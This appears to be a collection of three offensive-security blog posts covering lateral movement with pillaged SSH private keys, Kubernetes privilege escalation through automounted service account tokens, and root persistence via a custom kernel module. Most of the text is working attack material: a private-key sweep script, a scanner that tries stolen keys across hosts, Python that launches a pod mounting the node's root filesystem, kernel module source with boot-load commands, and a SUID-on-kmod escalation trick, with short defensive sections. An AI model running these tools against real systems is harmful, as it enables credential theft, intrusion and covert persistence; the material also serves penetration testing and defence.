Leveraging Pillaged SSH Keys

TLDR; These days when you run into a production Linux or cloud environment, it almost certainly uses public key authentication, making lateral movement as easy as leveraging pillaged SSH keys.

Level Setting

SSH (Secure Shell) is the primary means of managing cloud instances, Linux, Unix, OSX, networking devices, vendor appliances, and even some embedded devices. It’s also worth noting that Microsoft has received glowing reviews and support for its rollout of OpenSSH into current Windows builds, though it is not enabled by default. Generally speaking, SSH uses the server’s local user base and corresponding passwords to authenticate remote connections. However, SSH can also be configured to use Public Key authentication.

How SSH Public Key Authentication Works

SSH is designed to use RSA or DSA Public (encryption) and Private (decryption) key pairs to secure traffic. A user can add a Public key to their authorized_keys file to allow the holder of the corresponding Private key to authenticate as them. The client attempts to establish a secure connection by sending its username and the fingerprint of the Public key to the SSH server. If a Public key with the given fingerprint is within the requested user’s authorized_keys file, the SSH server responds with a challenge encrypted with that Public key. The challenge can only be decrypted with the corresponding Private key, so a correct response proves possession of the key and the client is successfully authenticated.
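
To make the mechanics concrete, here is a minimal sketch using the third-party paramiko library (an assumption on my part, not something required by SSH itself) that generates a key pair and prints the line you would append to a user’s authorized_keys file:

from paramiko import RSAKey

# Generate a new 2048-bit RSA key pair (the object holds both halves)
key = RSAKey.generate(2048)

# Write out the Private key; this is the file an attacker hopes to pillage
key.write_private_key_file("demo_key")

# The Public half, formatted as a one-line authorized_keys entry;
# the trailing comment field is optional and purely informational
print("%s %s %s" % (key.get_name(), key.get_base64(), "demo@example"))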

What is the Inherent Problem

These days when you run into a production Linux or cloud environment, more than likely the SSH services are going to use Public Key authentication. Traditional rapid password guessing won’t work if only public key authentication is enabled: if a Public key fingerprint is not submitted, the SSH server will simply terminate the session. So in order to pivot into a high-value environment, all that’s needed is to locate pillaged SSH private keys and leverage them with the proper usernames to gain further access.

How to Pillage SSH Keys

The good news is Private keys are fairly easy to locate on users’ workstations and development servers. They almost always reside within the default SSH directories:

  • Linux = /home/<user>/.ssh/
  • OSX = /Users/<user>/.ssh/
  • Windows = C:\Users\<user>\.ssh\

As such, they can be seamlessly picked up by an SSH client. It’s also worth digging through the home directories of admin, developer, and operations users for .ppk, .key, id_rsa, id_dsa, .p12, .pem, and .pfx files, as they may be private keys.
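
A quick sweep for those candidates can be scripted; the following is just a sketch using the Python standard library, with the name and extension lists mirroring the ones above:

import os

# Default key file names and extensions that commonly hold private keys
NAMES = ("id_rsa", "id_dsa")
EXTS = (".ppk", ".key", ".p12", ".pem", ".pfx")

# Walk every home directory tree and flag likely private key files
for base in ("/home", "/Users", r"C:\Users"):
    for root, dirs, files in os.walk(base):
        for name in files:
            if name in NAMES or name.endswith(EXTS):
                print(os.path.join(root, name))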

Using Publicly Disclosed Keys

The even better news is that many major product vendors (F5, Cisco, Barracuda, and VMware, to name a few) have been getting called out for distributing systems with static Private keys. This means that if an admin doesn’t log in, remove the old keys, and manually regenerate new ones, a shell can be established using publicly disclosed private keys.

Some good repositories of known bad keys:

https://github.com/rapid7/ssh-badkeys

https://github.com/BenBE/kompromat

The good news is Metasploit has several modules that make scanning discovered SSH services fairly easy. So all we need to do is feed it the proper data, run, and watch the shells rain in. Metasploit makes performing private key authentication easy and seamless: all you need to give it is a list of services, a username, and a private key. If authentication is successful, it will even seamlessly establish a shell session for you.

Leveraging Pillaged SSH Keys

First we need a private key file, either one we’ve located while pillaging or a publicly known bad key. For example, the publicly disclosed Vagrant Private key (Vagrant performs cross-platform virtual machine management).

The corresponding Public key looks like the following:

ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEA6NF8iallvQVp22WDkTkyrtvp9eWW6A8YVr+kz4TjGYe7gHzIw+niNltGEFHzD8+v1I2YJ6oXevct1YeS0o9HZyN1Q9qgCgzUFtdOKLv6IedplqoPkcmF0aYet2PkEDo3MlTBckFXPITAMzF8dJSIFo9D8HfdOV0IAdx4O7PtixWKn5y2hMNG0zQPyUecp4pzC6kivAIhyfHilFR61RGL+GPXQ2MWZWFYbAGjyiYJnAmCP3NOTd0jMZEnDkbUvxhMmBYSdETk1rRgm+R4LOzFUGaHqHDLKLX+FIPKcF96hrucXzcWyLbIbEgE98OHlnVYCzRdK8jlqm8tehUc9c9WhQ== vagrant insecure public key

The second thing needed is the username of the user who has the public key in their authorized_keys file. This can normally be found in the comment field at the end of the public key. In the case of the Vagrant key, the username is also widely known to be vagrant.

With a Private key and username combination, the auxiliary/scanner/ssh/ssh_login_pubkey module can be used to scan for systems that the private key works on. A session will be established whenever authentication is successful. When a session is established, Metasploit will also collect basic system information for you, including hostname, kernel version, and group memberships.
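
Because Metasploit option names shift slightly between versions, here is a version-independent sketch of the same scan using the paramiko library; the host list, username, and key path are all placeholders you would swap for your own data:

import paramiko

HOSTS = ["10.0.0.5", "10.0.0.6"]   # discovered SSH services (placeholders)
USERNAME = "vagrant"               # user expected to trust the key
KEY_FILE = "vagrant_insecure_key"  # pillaged or publicly known private key

for host in HOSTS:
    client = paramiko.SSHClient()
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        # Attempt public key authentication with the pillaged key
        client.connect(host, username=USERNAME, key_filename=KEY_FILE, timeout=5)
        stdin, stdout, stderr = client.exec_command("id")
        print("%s: %s" % (host, stdout.read().decode().strip()))
    except Exception as err:
        print("%s: authentication failed (%s)" % (host, err))
    finally:
        client.close()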

Finding the Username for Pillaged SSH Keys

Public keys listed within a user’s authorized_keys file can have comments after the actual key data. Most SSH key generators take advantage of this comment field to add the username and hostname when a key is generated.
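
Those comments are easy to harvest from a pillaged file; a rough sketch, ignoring entries that begin with option strings:

# Print the comment field (everything after the key data) of each entry
with open("authorized_keys") as keyfile:
    for line in keyfile:
        parts = line.strip().split(None, 2)  # key type, base64 data, comment
        if len(parts) == 3:
            print(parts[2])  # often "username@hostname"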

It’s also worth noting that most SSH clients keep a known_hosts file, for integrity purposes, which can be viewed to see which systems the key was recently used to access.

If you find just a Private key file during pillaging, the public key data can be derived from it in most cases. However, the username likely won’t be associated with it. When no username is found, a common-username file can be passed alongside the key in Metasploit.
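
For example, paramiko can recover the public key data from an unencrypted RSA private key file (the file name here is a placeholder):

from paramiko import RSAKey

# Load the pillaged private key (add password=... if it has a passphrase)
key = RSAKey.from_private_key_file("pillaged_key")

# Rebuild the authorized_keys-style public line; note that the comment
# field (and thus any username hint) is not stored in the private key
print("%s %s" % (key.get_name(), key.get_base64()))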

Speeding Scans up with sshscan

The Metasploit SSH modules are not thread safe, and running more than one connection at a time can cause a thread to hang or exhaust system resources. SSH in general is not considered thread safe, because responses after the authentication process are not formally structured. However, there is an SSH scanner written using the native Go SSH client, which works very well. Just take care to ensure the command you run provides simple, small, and structured output (like id). https://github.com/CroweCybersecurity/go-sshscan

SSH Defense Strategies

  1. When generating a Public and Private key pair, a passphrase can be provided to protect the keys. When a passphrase is set up, the SSH client must prompt for the passphrase every time the private key is used. Thus, if a key with a passphrase is discovered by an attacker, it’s normally not usable.
  2. Implement an enterprise key management solution to ensure all systems have their own private keys. This would simply crush the reuse factor and stop lateral movement.
  3. Configure the SSH server to require both the public key and the user’s password for authentication, as shown in the sshd_config fragment after this list. This will slow scanners to a crawl, as the password prompt causes the session to hang once key authentication has completed.
  4. Have a single Private key for all hosts that provides access to a lowest-privilege user. Once a connection is established, legitimate users can switch to their respective user accounts. If such a key were discovered during an assessment, we would have to dig through all the systems hoping for a major misconfiguration: hopefully, a needle in a haystack.
  5. Avoid key management altogether by utilizing a Certificate Authority (CA) backed system to automatically generate and sign key pairs for authorized users. The biggest tech companies already do this, and some have even blogged about it in the past.
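
A minimal sketch of option 3, assuming OpenSSH 6.2 or later where the AuthenticationMethods directive exists; test on a non-production host first, since a mistake here can lock out remote access:

# /etc/ssh/sshd_config (fragment)
# Require key authentication AND the account password, in that order
AuthenticationMethods publickey,password
PubkeyAuthentication yes
PasswordAuthentication yes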


Abuse Kubernetes with the Automount Service Account Token

While I was recently practicing to take my Certified Kubernetes Administrator (CKA) exam, I ran across an interesting default option called automountServiceAccountToken. This option automatically mounts the service account token within each container of a given pod. The token is meant to provide the pod the ability to interact with the Kubernetes API server. Being enabled by default, it creates a great way for attackers with access to a single container to abuse Kubernetes with the Automount Service Account token.

What is the Service Account Token?

Within Kubernetes, even a pod with only a single container must have a service account within its specification. This is because the service account dictates permissions and is used to run a pod’s processes. By default, if a service account isn’t provided during the creation of the pod, the “default” service account for the pod’s namespace is added automatically. Without a separate service account being automatically created within each namespace and added to each pod spec, there wouldn’t be any real resource/process separation between different namespaces.

How does automountServiceAccountToken work?

When a namespace is created within Kubernetes, the kube-controller-manager uses the serviceaccount-controller and the token-controller to make sure a service account called “default” exists with a valid API bearer token. When a pod is created within the new namespace, the admission controller checks the pod spec for a valid service account and adds the “default” service account if one doesn’t exist. If the automountServiceAccountToken option isn’t explicitly set to false within either the pod spec or the service account spec, the admission controller will also add a volume mount for the service account token to each container within the pod spec. This results in the namespaced secret for the service account token being mounted directly at /var/run/secrets/kubernetes.io/serviceaccount within every running container by default.
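
You can confirm this from inside any container that was created with the defaults; a minimal sketch:

import os

# The automounted service account credentials live here by default
sa_dir = "/var/run/secrets/kubernetes.io/serviceaccount"

# Typically lists ca.crt, namespace, and token
for name in os.listdir(sa_dir):
    path = os.path.join(sa_dir, name)
    print(name, len(open(path).read()), "bytes")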

Why is the Automount Service Account Token bad?

Since the permissions are assigned to a service account and all pod processes are run as the service account, effectively all pods within a given namespace operate at the same level. So when the service account token mount was added to provide better access to the Kubernetes API server, there wasn’t much need to disable it by default. Additionally, some popular tooling has utilized the service account token to communicate with Kubernetes, and as such it may be required in order to meet compatibility requirements.

However, this token becomes problematic if an attacker gains access to a container via some other exploit. This is further compounded by the fact that the default service account permissions are effectively read-write within the namespace and global read for most resource types. So with a simple script or even curl commands we can abuse Kubernetes with the automount service account token.
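
As a rough curl-equivalent sketch, using the third-party requests library and the in-cluster API endpoint (the kubernetes.default.svc name resolves inside pods by default):

import requests

sa_dir = "/var/run/secrets/kubernetes.io/serviceaccount"
token = open(sa_dir + "/token").read()
namespace = open(sa_dir + "/namespace").read()

# List pods in our namespace straight off the API server,
# authenticating with nothing but the automounted bearer token
resp = requests.get(
    "https://kubernetes.default.svc/api/v1/namespaces/%s/pods" % namespace,
    headers={"Authorization": "Bearer " + token},
    verify=sa_dir + "/ca.crt",
)
for item in resp.json().get("items", []):
    print(item["metadata"]["name"])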

How to Abuse Automount Service Account Token

I could probably write a whole post around the topic of interacting with the Kubernetes API, but luckily almost all major programming languages already have Kubernetes client libraries. In my case, I often write in Python, and the Python client library can handle loading a container’s service account token. With that token, we can utilize simple function calls like those in the following example to create and even delete our own pods.

from kubernetes import client, config
import time

# Load the containers local service account token
config.load_incluster_config()

# get the current namespace from automount for ease of use :)
current_namespace = open("/var/run/secrets/kubernetes.io/serviceaccount/namespace").read()

# Establish the core API object to interact with
v1=client.CoreV1Api()

# create a basic pod manifest
pod_manifest = {
            'apiVersion': 'v1',
            'kind': 'Pod',
            'metadata': {
                'name': 'busybox'
            },
            'spec': {
                'containers': [{
                    'image': 'busybox',
                    'name': 'sleep',
                    "args": [
                        "/bin/sh",
                        "-c", 
                        "while true;do python -c '<Shell code>';sleep 5; done"
                    ]
                }]
            }
        }

print("Listing all pods within the current namespace, before trying to add a pod")
ret = v1.list_namespaced_pod(namespace=current_namespace)
for i in ret.items:
    print("%s  %s  %s" % (i.status.pod_ip, i.metadata.namespace, i.metadata.name))

print("Trying to deploy a new pod with our custom pod manifest")
v1.create_namespaced_pod(namespace=current_namespace, body=pod_manifest)

time.sleep(10)
print("Listing all pods within the current namespace, after trying to add a busybox pod")
ret = v1.list_namespaced_pod(namespace=current_namespace)
for i in ret.items:
    print("%s  %s  %s" % (i.status.pod_ip, i.metadata.namespace, i.metadata.name))

print("Trying to delete the  busybox pod we just created")
v1.delete_namespaced_pod(name="busybox", namespace=current_namespace, body=client.V1DeleteOptions())

time.sleep(10)
ret = v1.list_namespaced_pod(namespace=current_namespace)
for i in ret.items:
    print("%s  %s  %s" % (i.status.pod_ip, i.metadata.namespace, i.metadata.name))

Using the Service Account Token to Escalate Privilege with the Node Root Volume

Since by default there aren’t any pod security policies to restrict the ability to mount a node’s local root filesystem, we can try to leverage the service account token within a compromised container to create a new pod with a volume that mounts the node’s root filesystem, using a similar script.

from kubernetes import client, config
import time

# Load the containers local service account token
config.load_incluster_config()

# get the current namespace from automount for ease of use :)
current_namespace = open("/var/run/secrets/kubernetes.io/serviceaccount/namespace").read()

# Establish the core API object to interact with
v1=client.CoreV1Api()

# create a basic pod manifest
pod_manifest = {
            'apiVersion': 'v1',
            'kind': 'Pod',
            'metadata': {
                'name': 'support'
            },
            'spec': {
                'containers': [{
                    'image': 'busybox',
                    'name': 'sleep',
                    "args": [
                        "/bin/sh",
                        "-c",
                        "while true;do python -c '<Shell code>';sleep 5; done"
                    ],
                    'volumeMounts': [{
                        'name': 'host',
                        'mountPath': '/host'
                    }]
                }],
                'volumes': [{
                    'name': 'host',
                    'hostPath': {
                        'path': '/',
                        'type': 'Directory'
                    }
                }]
            }
        }

print("Listing all pods within the current namespace, before trying to add a pod")
ret = v1.list_namespaced_pod(namespace=current_namespace)
for i in ret.items:
    print("%s  %s  %s" % (i.status.pod_ip, i.metadata.namespace, i.metadata.name))

print("Trying to deploy a new pod with our custom comand")
v1.create_namespaced_pod(namespace=current_namespace,body=pod_manifest)

time.sleep(10)
print("Listing all pods within the current namespace, after trying to add a busybox pod")
ret = v1.list_namespaced_pod(namespace=current_namespace)
for i in ret.items:
    print("%s  %s  %s" % (i.status.pod_ip, i.metadata.namespace, i.metadata.name))

You can also use a nodeSelector with a label like “kubernetes.io/hostname” to try to get the new pod to spin up on a higher-value control plane node.
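
For example, before calling create_namespaced_pod, the manifest above could be extended like the following; the hostname value is a placeholder, and keep in mind control plane nodes often carry a NoSchedule taint that would also require a matching toleration:

# Ask the scheduler to place the pod on a specific node by hostname label
pod_manifest['spec']['nodeSelector'] = {
    'kubernetes.io/hostname': '<control-plane-node-name>'
}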

With access to a pod container that has the node’s root filesystem mounted, normal file and credential pillaging can take place. With write access, easier persistence methods can also be used, like adding a crontab entry or leveraging controlled failure of systemd services (see my recent post), to gain a foothold on the Kubernetes control plane.

How to Fix Automount Service Account Token Issues?

Based on the official issue #57601, opened in late 2017, this issue is unlikely to be addressed until API v2 is available, because the current behavior is required for backwards compatibility. That being said, the issue can still be addressed manually by setting “automountServiceAccountToken: false” on the “default” service account for each namespace and/or creating an initializer to inject a custom service account upon pod creation. The only other option would be to patch a change into the admission controller, but that would risk compatibility issues and break future upgrades.
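
A minimal sketch of that manual fix, applied per namespace (for example with kubectl apply); pod specs support the same field if you need to scope it more tightly:

apiVersion: v1
kind: ServiceAccount
metadata:
  name: default
automountServiceAccountToken: false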

Establish Persistence with a Custom Kernel Module

First and foremost, I have to admit that establishing persistence with a custom kernel module isn’t the most ideal way. Creating kernel modules isn’t that easy: modules are normally compiled against a single kernel version, there are significant limitations on what can be done in kernel space, and errors can cause the system to freeze or crash. Regardless, I think it’s a valuable learning experience that all Linux security professionals should understand. For a much easier way to maintain access to modern systems, check out my post on persistence with systemd timers.

As mentioned, kernel space capabilities are largely limited to dealing with files and devices on behalf of userspace applications. Since modules themselves are loaded into the running kernel, it can be fairly difficult to write persistence code within a module that plays nicely with kernel space protections and limited functionality. Instead, we can leverage the kernel function “call_usermodehelper” to execute a command in userspace. Since by default only the root user can request that a module be loaded, this gives us command execution as root. In its most simplistic form, the source code for a module, test_shell.c, would look like the following.

#include <linux/module.h>    // included for all kernel modules
#include <linux/init.h>      // included for __init and __exit macros
#include <linux/kmod.h>      // for call_usermodehelper() (linux/umh.h on newer kernels)

MODULE_LICENSE("GPL");
MODULE_AUTHOR("sleventyeleven");
MODULE_DESCRIPTION("A Simple shell module");

static int __init shell_init(void)
{
    call_usermodehelper("/tmp/exe", NULL, NULL, UMH_WAIT_EXEC);
    return 0;    // Non-zero return means that the module couldn't be loaded.
}

static void __exit shell_cleanup(void)
{
    printk(KERN_INFO "Uninstalling Module!\n");
}

module_init(shell_init);
module_exit(shell_cleanup);

Since kernel mode capabilities and libraries are so limited, we can further simplify the payload execution by staging it in a standard C application instead. This allows the module to attempt to execute the staged application as root and still return normally regardless of what happens. The source code for a simple C execution program, named exe.c, might look like the following.

#include <stdlib.h>
int main(void)
{
    system("wall \"Hello There Im a Module!\"");
    return 0;
}

If we don’t want to stage a second executable to establish persistence with the custom kernel module, it’s possible to create variables for the user’s environment and command line arguments to be passed directly to the call_usermodehelper function. The module source code to do this might look like the following.

#include <linux/module.h>    // included for all kernel modules
#include <linux/init.h>      // included for __init and __exit macros
#include <linux/kmod.h>      // for call_usermodehelper() (linux/umh.h on newer kernels)


MODULE_LICENSE("GPL");
MODULE_AUTHOR("sleventyeleven");
MODULE_DESCRIPTION("A Simple shell module");

static int __init shell_init(void)
{

    static char *envp[] = {
    "HOME=/",
    "TERM=linux",
    "USER=root",
    "SHELL=/bin/bash",
    "PATH=/sbin:/usr/sbin:/bin:/usr/bin",
    NULL};

    char *argv[] = {
    "/bin/bash",    // argv[0] is the program being executed
    "-c",           // have bash run the next string as a command
    "wall \"Hello I'm a Module!\"",
    NULL};

    call_usermodehelper("/bin/bash", argv, envp, UMH_WAIT_EXEC);
    printk(KERN_INFO "Installing Module!\n");
    return 0;    // Non-zero return means that the module couldn't be loaded.
}

static void __exit shell_cleanup(void)
{
    printk(KERN_INFO "Uninstalling Module!\n");
}

module_init(shell_init);
module_exit(shell_cleanup);

Before compiling the module, you will need to be on the target system or a similar system with the same kernel version. You will also need all of the required tools for kernel development and the current kernel’s header files. The easiest way to get those is to run ‘apt-get install build-essential linux-headers-$(uname -r)’ on Debian-based systems or ‘yum install kernel-headers kernel-devel glibc-devel gcc gcc-c++ make’ on Red Hat-based systems.

Once the build tools are installed, we can create a Makefile with a kbuild (kernel build system) target to compile our module. Just keep in mind that kbuild will switch to the kernel source directory and only allow includes of headers within the kernel source, and that Makefile recipe lines must be indented with a tab.

obj-m += test_shell.o

all:
	make -C /lib/modules/$(shell uname -r)/build M=${PWD} modules

clean:
	make -C /lib/modules/$(shell uname -r)/build M=${PWD} clean

You can use a command like ‘insmod test_shell.ko’ to load the module directly into the kernel and ‘rmmod test_shell’ to remove it. This allows for easy testing of modules before configuring them to automatically load at boot.

Once the module is compiled and tests successfully, we can copy it to the current kernel’s modules directory.

cp test_shell.ko /lib/modules/`uname -r`/kernel/lib/

Next we need to run ‘depmod’ to rebuild the binary tree files of all the modules and dependencies. Without the dependency tree updated, the system won’t know our module exists or how to load it into the kernel.

depmod -a 

If we are going to stage the second executable for the module to attempt to execute, then we will need to compile it with gcc like the following.

gcc exe.c -o /tmp/exe

To have the custom kernel module loaded at boot time, we need to modify the config files for either modprobe or kmod, depending on which is used. In most cases you can easily figure out if it’s a kmod system by checking whether the standard module tools are just symbolic links to kmod. This can be done with a command like the following.

ls -al `which modprobe`

If you do see that modprobe is just a symbolic link to kmod, getting a registered module to start at boot is fairly simple. Just place the name of the module, minus the .ko extension, in the /etc/modules config file. This can be done with a simple command like the following, and will cause the systemd-modules-load service to utilize kmod to automatically load the module on boot.

echo 'test_shell' >> /etc/modules

Interestingly, you can actually set the SUID bit on kmod so that standard users can load modules as root, whereas if you set SUID on the legacy modprobe executable, it still runs in the user’s own context. So simply setting SUID on the kmod executable can be an easy way to establish privilege escalation, similar to the dash shell trick I’ve blogged about before.

If it’s not a kmod system, we can instead utilize modprobe to automatically start the custom module by creating a .conf file in the /etc/modprobe.d/ directory. The content of the .conf should look similar to:

install test_shell

On modprobe systems, standard users can also request that a module be loaded if a valid configuration file already exists, but any code execution is done within the requesting user’s context. Interestingly enough, you can have modprobe run a terminal command after loading a module by appending the command to the end of the install statement in the config file. That could work as a persistence method as well, but there is no guarantee that all filesystems are mounted and networking has been established when the module is loaded.

With all that work complete, we have established persistence, at least until the kernel is updated.